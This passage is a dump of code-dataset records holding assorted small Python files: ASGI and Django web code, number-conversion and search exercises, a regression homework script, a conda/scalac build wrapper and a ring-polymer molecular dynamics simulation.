self.response)\n\n if response_.cookies is not dict():\n response_cookies = [\n [\n b'Set-Cookie',\n cookie_.encode() + b'=' +\n response_.cookies[cookie_].cookie_str\n ]\n for cookie_ in response_.cookies.keys()]\n else:\n response_cookies = []\n await send({\n 'type': 'http.response.start',\n 'status': response_.status,\n 'headers': [\n [value.encode() for value in header_pair] for header_pair in list(response_.headers.items())\n ] + response_cookies\n })\n\n await send({\n 'type': 'http.response.body',\n 'body': response_.body.encode()\n })\n# End HTTP\n# lifespan\n elif scope[\"type\"] == \"lifespan\":\n while True:\n message = await receive()\n if message['type'] == 'lifespan.startup':\n self.config[\"startup\"]()\n await send({'type': 'lifespan.startup.complete'})\n elif message['type'] == 'lifespan.shutdown':\n self.config[\"shutdown\"]()\n await send({'type': 'lifespan.shutdown.complete'})\n return\n# End lifespan\n# WebSocket\n\n# Not implemented yet.\n\n# End WebSocket\n","sub_path":"willpyre/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"165875605","text":"from django.shortcuts import render\r\n\r\nfrom article.forms import ArticleForm\r\nfrom article.models import Article, Comment\r\n\r\n\r\ndef article(request):\r\n \"\"\"\r\n Render the page\r\n \"\"\"\r\n articles = {} \r\n for article in Article.objects.all():\r\n articles.update({article:Comment.objects.filter(article=article)})\r\n context = {'articles':articles} #利用範本變數articles將查詢結果傳至範本\r\n \r\n return render(request, 'article/article.html', context)\r\n# Create your views here.\r\n\r\n\r\ndef articleCreate(request):\r\n \"\"\"\r\n Create a new article instance\r\n 1. if method is GET, render an empty form\r\n 2. if methond is POST, perform form validation and display error messages if the form is invalid\r\n 3. save the form to the model and redirect the user to the aritcle page\r\n \"\"\"\r\n template = 'article/articleCreate.html'\r\n print(ArticleForm())\r\n if request.method =='GET':\r\n return render(request, template, {'articleForm':1234})\r\n \r\n \r\n \r\n \r\n ","sub_path":"financial/article/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"74548569","text":"# function for octal no. at decimal place\r\ndef OctalToDecimal(octal):\r\n\r\n octal1 = octal\r\n decimal, i, n = 0, 0, 0\r\n while(octal != 0):\r\n dec = octal % 10\r\n decimal = decimal + dec * (8**i)\r\n octal = octal//10\r\n i += 1\r\n print(decimal)\r\n\r\n# function for octal no. at fractional place\r\n\r\n\r\ndef OctalToDecimal1(octal1):\r\n # Python Program to Reverse a Number using While loop\r\n\r\n Reverse = 0\r\n while(octal1 > 0):\r\n Reminder = octal1 % 10\r\n Reverse = (Reverse * 10) + Reminder\r\n octal1 = octal1 // 10\r\n\r\n decimal, i, n = 0, 1, 0\r\n while(Reverse != 0):\r\n dec = Reverse % 10\r\n decimal = decimal + dec * (8**-i)\r\n Reverse = Reverse//10\r\n i += 1\r\n print(decimal)\r\n\r\n# taking value of octal no. at decimal place\r\n\r\n\r\noctal = int(input(\"Enter the octal no.\"))\r\n\r\n# function call\r\nOctalToDecimal(octal)\r\n\r\n# taking value of octal no. after fraction place\r\noctal1 = float(input(\"Enter the octal no. after the decimal place\"))\r\n\r\n# function call\r\nOctalToDecimal1(octal1)\r\n","sub_path":"Conversion/OctalToDecimal.py","file_name":"OctalToDecimal.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"90504262","text":"from atm_list_class import ATM\n\n\n\nbalance1 = 500\nbalance2 = 1000\nbalance3 = 20000\n\natm1 = ATM(balance1, \"Smart Bank\")\natm2 = ATM(balance2, \"Baraka Bank\")\natm3 = ATM(balance3, \"Cairo Bank\")\n\natm1.withdraw(600)\natm1.withdraw(200)\natm1.withdraw(23)\natm1.withdraw(50)\n\natm2.withdraw(50)\natm2.withdraw(70)\natm2.withdraw(30)\natm2.withdraw(100)\n\natm3.withdraw(533)\natm3.withdraw(100)\natm3.withdraw(499)\natm3.withdraw(600)\n\natm1.show_withdrawls()\natm2.show_withdrawls()\natm3.show_withdrawls()","sub_path":"atm solution/atmlist/atm_list_teast.py","file_name":"atm_list_teast.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"583952085","text":"\"\"\"\nEXERCISE:\n1) Read in the 'hour.csv' file\n2) Run the regression with: cnt ~ temp + hum + workingday + hour + C(weathersit)\n3) Evaluate the results, how does this compare with the day \n3) Create a binary variable for rush hour defined by 6-9a & 4-6p\n4) Run the regression again. Does this new variable improve the results?\n\"\"\"\nimport pandas as pd\nimport statsmodels.formula.api as smf\nimport statsmodels.api as sm\nimport matplotlib.pyplot as plt\nimport numpy as np\n# 1\nbike_dat = pd.read_csv(\"hours.csv\")\nbike_dat.head()\nlen(bike_dat)\n\"\"\"\n weathersit : \n- 1: Clear, Few clouds, Partly cloudy, Partly cloudy \n- 2: Mist + Cloudy, Mist + Broken clouds, Mist + Few clouds, Mist \n- 3: Light Snow, Light Rain + Thunderstorm + Scattered clouds, Light Rain + Scattered clouds \n- 4: Heavy Rain + Ice Pallets + Thunderstorm + Mist, Snow + Fog \n\"\"\"\n\n#2 and 3\nhours_lm = smf.ols(formula='cnt ~ temp + hum + workingday + hr + C(weathersit)', data=bike_dat).fit()\nhours_lm.summary()\n##R-squared is only .328, the weathersit[T.4] is not significant\n##all other variables' CI do not include 0\n\n\n\nbike_dat_days = pd.read_csv(\"days.csv\")\nbike_dat_days.head()\nlen(bike_dat_days)\ndays_lm = smf.ols(formula='cnt ~ temp + hum + workingday + C(weathersit)', data=bike_dat_days).fit()\ndays_lm.summary()\n\n##R-squared is higher for the daily model\n## workingday is not significant if p is 5%\n\nbike_dat['hr'].describe() #values take on 0 23\nbike_dat['rushhour']=bike_dat['hr'].apply(lambda x: 1 if (x>=6 and x<=8) or (x>=16 and x<=18) else 0)\n#[1 if (bike_dat['hr']>=6 & bike_dat['hr']<=8) | (bike_dat['hr']>=16 & bike_dat['hr']<=18) else 0 for row in bike_dat]\n\nrush_lm = smf.ols(formula='cnt ~ temp + hum + workingday + rushhour + C(weathersit)', data=bike_dat).fit()\nrush_lm.summary()\n##this variable does improve results but the binary varialbes for weathersit are not significant\nrush_lm_2 = smf.ols(formula='cnt ~ temp + hum + workingday + rushhour', data=bike_dat).fit()\nrush_lm_2.summary()\n##removing did not increase R squared\n##how do you remove just one/two of the C(weathersit) variables\n","sub_path":"christine/Hmwk 10282014/october28hmwk.py","file_name":"october28hmwk.py","file_ext":"py","file_size_in_byte":2076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"430514376","text":"from django.db import models\nfrom django.db.models.deletion import CASCADE\nfrom django.db.models.fields import related\n\n\nclass Pet_page(models.Model):\n # user_id = models.ForeignKey\n user_id = models.IntegerField()\n title = models.CharField(max_length=50)\n\n\n# Create your models here.\nclass Pet(models.Model):\n # user_id = models.ForeignKey\n user_id = models.IntegerField()\n pet_page_id = models.ForeignKey(Pet_page, on_delete=CASCADE, related_name='pets')\n pet_image = models.ImageField()\n name = models.CharField(max_length=30)\n birthday = models.DateField()\n voice = models.FileField()\n deathday = models.DateField()\n status = models.CharField(max_length=20)\n\n\nclass Pet_day(models.Model):\n # user_id = models.ForeignKey\n user_id = models.IntegerField()\n pet_page_id = models.ForeignKey(Pet_page, on_delete=CASCADE)\n emoticon_01 = models.IntegerField()\n emoticon_02 = models.IntegerField()\n emoticon_03 = models.IntegerField()\n emoticon_04 = models.IntegerField()\n emoticon_05 = models.IntegerField()\n\n\n","sub_path":"PetAlbum/pet/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"278749954","text":"#!/usr/bin/env python\n\nimport argparse\nimport errno\nimport fnmatch\nimport logging\nimport os\nimport re\nimport shutil\nimport subprocess\nimport sys\n\nimport conda.config\nimport conda.misc\n\nconda_meta_prefix = conda.config.default_prefix+os.sep+'conda-meta'\npackages_available = conda.misc.walk_prefix(conda_meta_prefix)\npackage_by_name={}\nfor pack in packages_available:\n package_by_name[pack.rsplit('-',2)[0]]=pack\n\ndef read_deps(package):\n if package not in package_by_name:\n return []\n with open(conda_meta_prefix+os.sep+package_by_name[package]) as f:\n import json\n j = json.load(f)\n depends = j['depends']\n # these have version information too\n # for now, assume that the only versions in the prefix have been pulled in for me\n # and no other versions exist\n depends = [j.split(' ')[0] for j in depends]\n return depends\n\n# TODO (very far future): support multiple package lists\ndef resolve_dependencies(packages):\n # do a BFS for dependencies\n this_layer = packages\n next_layer = []\n found = []\n while this_layer:\n for pack in this_layer:\n if pack in found:\n continue\n found.append(pack)\n dep = read_deps(pack)\n if dep is not None:\n next_layer += dep\n this_layer = next_layer\n next_layer = []\n return found\n\n# from conda/cli/main_package.py\ndef list_package_jars(pkg_name=None):\n import os\n import re\n import conda.config as config\n from conda.misc import walk_prefix\n\n if pkg_name.endswith('.jar'):\n return [os.path.abspath(pkg_name)]\n\n pkgs_dirs = config.pkgs_dir_from_envs_dir(conda.config.envs_dirs[0])#config.pkgs_dirs[0]\n all_dir_names = []\n pattern = re.compile(pkg_name, re.I)\n\n print('\\nINFO: The location for available packages: %s' % (pkgs_dirs))\n\n for dir in os.listdir(pkgs_dirs):\n ignore_dirs = [ '_cache-0.0-x0', 'cache' ]\n\n if dir in ignore_dirs:\n continue\n\n if not os.path.isfile(pkgs_dirs+os.sep+dir):\n match = pattern.match(dir)\n\n if match:\n all_dir_names.append(dir)\n\n num_of_all_dir_names = len(all_dir_names)\n dir_num_width = len(str(num_of_all_dir_names))\n\n if num_of_all_dir_names == 0:\n print(\"\\n\\tWARN: There is NO '%s' package.\\n\" % (pkg_name))\n return 1\n elif num_of_all_dir_names >= 2:\n print(\"\\n\\tWARN: Ambiguous package name ('%s')\\n\" % (pkg_name))\n\n full_pkg_name = all_dir_names[0]\n pkg_dir = pkgs_dirs+os.sep+full_pkg_name\n ret = walk_prefix(pkg_dir, ignore_predefined_files=False)\n return [pkg_dir + os.sep + i for i in ret if i.endswith('.jar')]\n\n\ndef copy_dir(src, dst):\n \"\"\"Copies the contents of the directory src and places them in an already\n existing directory dst.\"\"\"\n assert os.path.exists(src)\n assert os.path.exists(dst)\n\n for filename in os.listdir(src):\n try:\n # TODO: check and ensure dst does not exist?\n shutil.copytree(os.path.join(src, filename),\n os.path.join(dst, filename))\n except OSError as e:\n if e.errno == errno.ENOTDIR:\n shutil.copy(os.path.join(src, filename),\n os.path.join(dst, filename))\n else:\n raise e\n\ndef main(args=None):\n if args is None:\n args = sys.argv[1:]\n\n logging.basicConfig(level=logging.INFO)\n logger = logging.getLogger(__name__)\n\n parser = argparse.ArgumentParser(description=\"Chisel compiler wrapper script\")\n parser.add_argument('sourceDirs', nargs='+', default='src/main/scala',\n help=\"\"\"list of source directories containing Chisel code,\n scanned recursively\"\"\")\n parser.add_argument('--resourceDirs', nargs='*', default=[],\n help=\"\"\"list of resource directories, the contents of\n which are copied into the resulting JAR\"\"\")\n parser.add_argument('--classpath', nargs='*', default=[],\n help=\"\"\"dependency JARs to add to the classpath; those\n sharing the same name as a dependency JAR\n specified by the package manager will take\n priority\"\"\")\n parser.add_argument('--scalacOpts', nargs='*', default=['deprecation', 'feature',\n 'language:reflectiveCalls',\n 'language:implicitConversions',\n 'language:existentials'],\n help=\"\"\"list of arguments to pass to scalac, in addition\n to those specified by dependencies\"\"\")\n parser.add_argument('-o', '--outputJar', default=None,\n help=\"filename and path of output JAR\")\n parser.add_argument('-l', '--link', default=[], action='append',\n help=\"\"\"\"GCC style link against a conda package\"\"\")\n parser.add_argument('--linkJars', type=bool, default=True,\n help=\"\"\"incorporate the contents of dependency JARs into\n the output JAR\"\"\")\n parser.add_argument('--jarEntryPoint', default=None,\n help=\"entrypoint / Main-Class for the JAR\")\n\n args = parser.parse_args(args)\n\n packages = args.link\n packages_plus_depends = resolve_dependencies(packages)\n logging.debug(\"Packages including dependencies: %s\", packages_plus_depends)\n\n package_classpaths = []\n for package in packages_plus_depends:\n package_classpath = list_package_jars(package)\n package_classpaths.extend(package_classpath)\n logging.debug(\"Added classpath for '%s': %s\",\n package, package_classpath)\n\n # Add override classpaths from command line arguments\n classpaths = []\n classpaths_args_basenames = [os.path.basename(classpath)\n for classpath in args.classpath]\n for package_classpath in package_classpaths:\n if os.path.basename(package_classpath) in classpaths_args_basenames:\n logging.info(\"Dropping package classpath %s (overridden by --classpath argument)\", package_classpath)\n else:\n classpaths.append(package_classpath)\n\n classpaths.extend([os.path.abspath(classpath)\n for classpath in args.classpath])\n\n\n # Get all the source files\n source_files = []\n for source_dir in args.sourceDirs:\n for root, _, filenames in os.walk(source_dir):\n for filename in fnmatch.filter(filenames, '*.scala'):\n source_files.append(os.path.join(root, filename))\n logging.info(\"Found %i source files\", len(source_files))\n\n scalac_args = ['scalac']\n scalac_args.extend(source_files)\n\n scalacopts = args.scalacOpts\n scalacopts = [\"-\" + scalacopt for scalacopt in scalacopts]\n if scalacopts:\n logging.debug(\"Using scalacopts: %s\", scalacopts)\n scalac_args.extend(scalacopts)\n\n if classpaths:\n for classpath in classpaths:\n if not os.path.exists(classpath):\n logging.error(\"Required classpath %s doesn't exist\", classpath)\n # TODO: support Windows OS (uses semicolon for classpath separator)\n classpath_str = ':'.join(classpaths)\n\n logging.debug(\"Using classpath: %s\", classpath_str)\n scalac_args.extend(['-classpath', classpath_str])\n\n if args.outputJar:\n scalac_args.extend(['-d', os.path.abspath(args.outputJar)])\n\n logging.info(\"Running scalac\")\n scalac_returncode = subprocess.call(scalac_args)\n logging.debug(\"scalac done\")\n\n if scalac_returncode != 0:\n logging.error(\"scalac returned nonzero return code: %i\", scalac_returncode)\n sys.exit(1)\n\n # Add resources\n for resource_dir in args.resourceDirs:\n logging.info(\"Copying resources in %s\", resource_dir)\n jar_args = ['jar', 'uf', os.path.abspath(args.outputJar), '-C', resource_dir]\n logging.info(\"Running jar\")\n for root, _, filenames in os.walk(resource_dir):\n for filename in filenames:\n jar_returncode = subprocess.call(jar_args + [filename])\n logging.debug(\"jar done\")\n\n if jar_returncode != 0:\n logging.error(\"jar returned nonzero return code: %i\", jar_returncode)\n sys.exit(1)\n\nif __name__==\"__main__\":\n main()\n","sub_path":"chiselc/chiselc.py","file_name":"chiselc.py","file_ext":"py","file_size_in_byte":8028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"224596802","text":"import numpy as np\nfrom model import parameters as param\nfrom model import Hel,dHel,Hel0,dHel0\nfrom numpy.random import random\nimport math\n\n#===============intializing nuclear positions with Monte-carlo sampling===========\ndef monte_carlo(param, steps = 3000, dR = 0.5):\n R = np.zeros((param.ndof,param.nb))\n ndof, nb = R.shape\n βn = param.beta/nb \n\n #Monte carlo loop\n for i in range(steps):\n rDof = np.random.choice(range(ndof))\n rBead = np.random.choice(range(nb))\n\n # Energy before Move\n En0 = ringPolymer(R[rDof,:], param) + Hel0(R[rDof,rBead]) \n\n # update a bead -------------\n dR0 = dR * (random() - 0.5)\n R[rDof, rBead] += dR0\n #----------------------------\n # Energy after Move\n En1 = ringPolymer(R[rDof,:], param) + Hel0(R[rDof,rBead]) \n\n # Probality of MC\n Pr = np.min([1.0,np.exp(-βn * (En1-En0))])\n # a Random number\n r = random()\n # Accepted\n if r < Pr:\n pass\n # Rejected\n else:\n R[rDof, rBead] -= dR0\n return R\n\n\ndef ringPolymer(R,param):\n \"\"\"\n Compute Ringpolymer Energy\n E = ∑ 0.5 (m nb^2/β^2) (Ri-Ri+1)^2\n \"\"\"\n nb = param.nb\n βn = (param.beta)/nb \n Ω = (1 / βn) \n M = param.M\n E = 0\n for k in range(-1,nb-1):\n E+= 0.5 * M * Ω**2 * (R[k] - R[k+1])**2\n return E\n#==========================================================\n\n\n#=============initializing nuclear momentum================ \ndef initP(param):\n nb, ndof = param.nb , param.ndof\n sigp = (param.M * param.nb/param.beta)**0.5\n return np.random.normal(size = (ndof, nb )) * sigp\n#==========================================================\n\n\n#===========initializing mapping variables==========\ndef initMap(param):\n \"\"\"\n initialize Mapping variables q and p\n dimensionality q[nstate,nb] so do p\n \"\"\"\n q = np.zeros((param.nstate,param.nb))\n p = np.zeros((param.nstate,param.nb))\n i0 = param.initState\n for i in range(param.nstate):\n for ib in range(param.nb):\n η = np.sqrt(1 + 2*(i==i0))\n θ = random() * 2 * np.pi\n q[i,ib] = η * np.cos(θ) \n p[i,ib] = η * np.sin(θ) \n return p,q\n#============================================================\n\n#========Calculation of non-adiabatic force term=======\ndef Force(R,q,p,dHij,dH0):\n \"\"\"\n Nuclear Force\n dH => grad of H matrix element\n must NOT include state independent\n part as well\n - 0.5 ∑ dHij (qi * qj + pi * pj - dij) \n \"\"\" \n\n F = np.zeros((R.shape)) # ndof nbead\n\n #----- state independent part-----------\n F[:] = -dH0 \n \n #------- state dependent part------------\n qiqj = np.outer(q,q)\n pipj = np.outer(p,p)\n γ = np.identity(len(q))\n rhoij = 0.5 * ( qiqj + pipj - γ) \n #------ total force term--------------- \n for i in range(len(F)):\n F[i] -= np.sum(rhoij * dHij[:,:,i])\n return F\n#======================================================\n\n#============ normal mode transformation==============\ndef nm_t(P,R,param):\n\n \"\"\"\n normal mode transformation = fourier transform from bead\n representation to mode representation\n\n see Eq(36) and (37) at J. Chem. Phys. 154, 124124 (2021)\n \"\"\" \n\n nb = param.nb\n ndof = param.ndof\n lb_n = param.lb_n\n ub_n = param.ub_n\n \n cmat = np.zeros((nb,nb)) # normal mode transformation matrix\n pibyn = math.acos(-1.0)/nb\n\n\n P_norm = np.zeros((ndof,nb)) #normal modes for momenta\n Q_norm = np.zeros((ndof,nb)) #normal modes for position\n\n for j in range(nb):\n for i in range(nb):\n l=(i-int(nb/2))\n if l==0:\n cmat[j,l] = 1.0\n elif l >= lb_n and l<0:\n cmat[j,l] = np.sqrt(2.0)*np.sin(2.0*pibyn*(j+1)*l)\n elif l > 0 and l <= ub_n:\n cmat[j,l] = np.sqrt(2.0)*np.cos(2.0*pibyn*(j+1)*l)\n\n\n\n pnew = np.zeros((ndof,nb))\n qnew = np.zeros((ndof,nb))\n\n for j in range(nb):\n for i in range(nb):\n l=(i-int(nb/2))\n for m in range(ndof):\n pnew[m,l]+= P[m,j]*cmat[j,l]\n qnew[m,l]+= R[m,j]*cmat[j,l]\n\n\n P_norm = pnew/nb\n Q_norm = qnew/nb\n\n return P_norm, Q_norm\n#==========================================================\n\n#========== back normal mode transformation================\ndef back_nm_t(P_norm,Q_norm,param):\n\n \"\"\"\n back normal mode transformation = fourier transform from mode\n representation to bead representation\n\n see Eq(36) and (37) at J. Chem. Phys. 154, 124124 (2021)\n \"\"\" \n\n nb = param.nb\n ndof = param.ndof\n lb_n = param.lb_n\n ub_n = param.ub_n\n\n cmat = np.zeros((nb,nb)) # transformation matrices\n pibyn = math.acos(-1.0)/nb\n\n P = np.zeros((ndof,nb)) # bead representation momenta\n R = np.zeros((ndof,nb)) # bead representation position\n\n\n for j in range(nb):\n for i in range(nb):\n l=(i-int(nb/2))\n if l==0:\n cmat[j,l] = 1.0\n elif l >= lb_n and l<0:\n cmat[j,l] = np.sqrt(2.0)*np.sin(2.0*pibyn*(j+1)*l)\n elif l > 0 and l <= ub_n:\n cmat[j,l] = np.sqrt(2.0)*np.cos(2.0*pibyn*(j+1)*l)\n\n pnew = np.zeros((ndof,nb))\n qnew = np.zeros((ndof,nb)) \n\n for j in range(nb):\n for i in range(nb):\n l=(i-int(nb/2))\n for m in range(ndof):\n pnew[m,j]+= P_norm[m,l]*cmat[j,l]\n qnew[m,j]+= Q_norm[m,l]*cmat[j,l]\n\n P = pnew\n R = qnew\n\n return P,R\n#==================================================================\n\n#======== polynomials for free ring-polymer propagation===============\ndef ring(param):\n \n \"\"\"\n see Ceriotti, Parinello JCP 2010 \n \"\"\"\n\n nb = param.nb\n ndof = param.ndof\n dt = param.dtN\n M = param.M\n beta = param.beta\n lb_n = param.lb_n\n ub_n = param.ub_n\n\n poly = np.zeros((4,nb))\n \n #Monodromy matrix for free ring-polymer update\n\n betan = beta/nb\n twown = 2.0/(betan)\n pibyn = math.acos(-1.0)/nb\n\n for i in range(nb):\n l=(i-int(nb/2))\n\n if l==0:\n poly[0,0] = 1.0\n poly[1,0] = 0.0\n poly[2,0] = dt/M\n poly[3,0] = 1.0\n \n elif l >= lb_n and l<0:\n poly[0,l]=np.cos(twown*np.sin(l*pibyn)*dt)\n poly[1,l]=-twown*np.sin(l*pibyn)*M*np.sin(twown*np.sin(l*pibyn)*dt)\n poly[2,l]=np.sin(twown*np.sin(l*pibyn)*dt)/(twown*np.sin(l*pibyn)*M)\n poly[3,l]=np.cos(twown*np.sin(l*pibyn)*dt)\n \n elif l > 0 and l <= ub_n:\n poly[0,l]=np.cos(twown*np.sin(l*pibyn)*dt)\n poly[1,l]=-twown*np.sin(l*pibyn)*M*np.sin(twown*np.sin(l*pibyn)*dt)\n poly[2,l]=np.sin(twown*np.sin(l*pibyn)*dt)/(twown*np.sin(l*pibyn)*M)\n poly[3,l]=np.cos(twown*np.sin(l*pibyn)*dt)\n\n return poly\n\n#==============================================================================\n\n#=========== free ring-polymer propagation ============================\ndef freerp(P,R,param):\n\n \"\"\"\n see Eq. 22 to 24 of Ceriotti, Parinello JCP 2010 \n\n \"\"\"\n nb = param.nb\n ndof = param.ndof\n\n P_norm = np.zeros((ndof,nb)) #normal modes for momenta\n Q_norm = np.zeros((ndof,nb)) #normal modes for position\n poly = np.zeros((4,nb))\n\n poly = ring(param) # calling ring() function to obtain the polynomials\n\n P_norm, Q_norm = nm_t(P,R,param) #normal mode obtained\n\n for k in range(nb):\n for j in range(ndof):\n l=(k-int(nb/2))\n \n pjknew = P_norm[j,l]*poly[0,l] + Q_norm[j,l]*poly[1,l]\n Q_norm[j,l] = P_norm[j,l]*poly[2,l] + Q_norm[j,l]*poly[3,l]\n P_norm[j,l] = pjknew\n\n\n P,R = back_nm_t(P_norm,Q_norm,param) # from normal mode to bead\n\n return P,R\n#=======================================================================\n\n#========== velocity-verlet for mapping oscillators (each bead)========\ndef vvMap(p,q,Hij,dtE):\n \"\"\"\n Hel => function\n q[nstate, nb]\n dqi/dt = dH/dpi = ∑_i Hij pj | dq/dt = Hij @ p\n dpi/dt = - dH/dqi = -∑_i Hij qj | dp/dt = -Hij @ q \n ℒ => ℒp dt/2 . ℒq dt . ℒp dt/2\n \"\"\"\n # propagate p half step (dt/2)\n # p(t+dt) = p(t) + dp/dt * dt \n p += (-Hij @ q ) * dtE/2\n\n # propagate q half step\n # q(t+dt) = q(t) + qp/dt * dt \n q += (Hij @ p) * dtE \n\n # propagate p half step (dt/2)\n # p(t+dt) = p(t) + dp/dt * dt \n p += (-Hij @ q ) * dtE/2\n\n return p,q\n#=======================================================================\n\n#============ nonadiabatic velocity-verlet algorithm====================\ndef run_traj(P,R,p,q,param):\n\n \"\"\"\n Velocity Verlet Nonadiabatic\n ℒ => (ℒpx.dt/2) (ℒPR.dt) (ℒpx.dt/2)\n (ℒPR.dt) => (ℒP.dt/2) (ℒR.dt) (ℒP.dt/2)\n\n see Eq.(16) of Ceriotti, Parinello JCP 2010 \n\n \"\"\"\n Hel = param.Hel\n dHel = param.dHel\n dHel0 = param.dHel0\n nb = param.nb \n M = param.M\n dtN,dtE = param.dtN,param.dtE\n EStep = param.EStep\n\n\n #---(ℒpx.dt)---------------\n for ib in range(nb):\n Hij = Hel(R[:,ib])\n # propagate electronic degrees\n for _ in range(EStep):\n p[:,ib], q[:,ib] = vvMap(p[:,ib], q[:,ib], Hij, dtE)\n\n \n #---(ℒPR.dt)-----------------\n #-----(ℒP.dt/2)--------------\n for ib in range(nb):\n dHij = dHel(R[:,ib]) # state-dependent\n dH0 = dHel0(R[:,ib]) # state-independent\n # Obtain Force \n F = Force(R[:,ib], q[:,ib], p[:,ib], dHij, dH0)\n # propagate half-step velocity\n P[:,ib] += F * dtN/2 \n \n # evolution of free ring-polymer\n P,R = freerp(P,R,param) \n \n #-----(ℒP.dt/2)--------------\n for ib in range(nb):\n dHij = dHel(R[:,ib])\n dH0 = dHel0(R[:,ib])\n # Obtain Force \n F = Force(R[:,ib], q[:,ib], p[:,ib], dHij, dH0)\n # propagate half-step velocity\n P[:,ib] += F * dtN/2 \n \n return P,R,p,q\n\n#============ polulation estimator (reduced density matrix)=========\ndef pop(p,q,param):\n nb = param.nb\n nstate = param.nstate\n rho = np.zeros((nstate,nstate))\n \n for ib in range(nb):\n \n rho += 0.5*(np.outer(q[:,ib],q[:,ib])+np.outer(p[:,ib],p[:,ib])-np.identity(len(p[:,ib])))\n \n return rho/nb\n#---------------------------------------------------------------------------\n#----------trajectory loops--------------------\n\nif __name__ == \"__main__\" :\n \n ndof = param.ndof\n nb = param.nb\n NTraj = param.NTraj\n nstate = param.nstate\n NSteps = param.NSteps\n dt=param.dtN\n\n rho_ensemble = np.zeros((nstate,nstate,NSteps))\n\n #f = open(\"R_traj.txt\", \"w+\")\n \n for itraj in range(NTraj):\n\n R = monte_carlo(param) # initialize R\n P = initP(param) # initialize P\n p,q = initMap(param) # initialize p,q\n \n # f.write(f\"{itraj} {' '.join(R[0,0:nb].astype(str))} \\n\")\n\n param.Hel = Hel\n param.dHel = dHel \n param.dHel0 = dHel0 \n\n for isteps in range(NSteps):\n \n P,R,p,q = run_traj(P,R,p,q,param)\n \n #------ calculating population and coherences ------\n rho_ensemble[:,:,isteps] += pop(p,q,param) \n \n\n rho_ensemble = rho_ensemble/NTraj\n \n #f.close() \n\nf = open(\"pop.txt\", \"w+\")\nfor isteps in range(NSteps):\n f.write(f\"{isteps*dt}\\t\")\n for i in range(nstate):\n f.write(f\"{rho_ensemble[i,i,isteps]}\\t\")\n f.write(\"\\n\")\nf.close() \n\n#----------- nonadiabatic Ring-Polymer Molecular Dynamics code-------------------------\n#------------ (calulaion of reduce density matrix)-----------------------------------\n#-------- see [S N. Chowdhury and P.Huo, JCP, 121, 3368 (2019)]-------\n\n\n\n\n\n\n\n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n \n \n #q, p = initMap(param) # initialize q, p\n\n # print(\"q=\",q)\n # print(\"p=\",p)\n \n # rho_final = pop(q,p,param)\n \n # print(\"--------------\")\n # print(rho_final)\n # print(\"--------------\")\n\n \n\n\n","sub_path":"rpmd.py","file_name":"rpmd.py","file_ext":"py","file_size_in_byte":12156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"362490601","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\nfrom portal\timport views\n\n\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n\n url(r'^admin/', include(admin.site.urls)),\n\n (r'^/?$', views.user_login),\n (r'^RequestResource/?$', views.resource_request_view),\n (r'^Results/?$', views.display_results_view),\n (r'^UsageRequest/?$', views.usage_request_view),\n (r'^Results/(?P\\w+)/(?P\\d+:\\d+:\\d*)/(?P\\d+:\\d+:\\d*)/?$', views.resource_selected_view),\n (r'^MyCheckouts/?$', views.get_my_checkouts),\n\n)\n","sub_path":"Schedulize/Schedulize/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"155214052","text":"A = [1, 2, 3, 6, 8, 192]\nnum = int(input(\"Enter a number: \"))\n#a = \"False\"\n#for x in A:\n# if x == num:\n# a = \"True\"\n# print(a)\n# break\n# elif x == A[-1] and x != num:\n# print(a)\ncount = 0\nfor x in A:\n if x == num:\n count +=1\n print(\"True\")\n break\nif count == 0:\n print(\"False\")\n \n\n\n\n\n","sub_path":"arraysearch.py","file_name":"arraysearch.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"165944680","text":"#---------------^_^-------------^_^-------\n#利用python仿真双缝实验\n#程序再版与2019/1/5,初版写于2017年12月\n#作者:cclplus\n#仅供学习交流使用\n#如有疑问或者需求,可以联系作者707101557@qq.com\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport math\nfrom ctypes import *\n#dll = cdll.LoadLibrary('laser.dll');\ndll=WinDLL('laser.dll')\nclass StructPointer(Structure): \n _fields_ = [(\"arr\", c_double * 2500)] \n def __init__( self ):\n for i in range(2500):\n self.arr[i]=0.0\ndll.laser_mode.restype = POINTER(StructPointer) \nn=c_long(50) #方镜上点的个数\nn_b=int(50)\nk=c_long(30)\n#ccl=np.ones((n,n),float)\nccl=StructPointer()\n#dll.hello()\nccl=dll.laser_mode(n,k)\nI=np.zeros((n_b,n_b),float)\nfor i in range(n_b):\n for j in range(n_b):\n I[i][j]=ccl.contents.arr[i*n_b+j]\nX=range(n_b)\nY=range(n_b)\nfig = plt.figure()\nax = Axes3D(fig)\nax.plot_surface(X,Y,I, rstride=1, cstride=1, cmap='rainbow')\nplt.show()\n","sub_path":"laser.py","file_name":"laser.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"173217837","text":"# Minh Pham\n# CSE 491\n\nimport cgi # for fieldStorage - parsing data\nimport jinja2 # for template\nfrom werkzeug.wrappers import Response # for making wrapper class\nfrom mimetypes import guess_type # for mapping file extension to mimetype\n\n# jinja file path\nJinjaTemplateDir = './templates'\n\n# Other type of resources (.ico, .jpg, ...)\nResDir 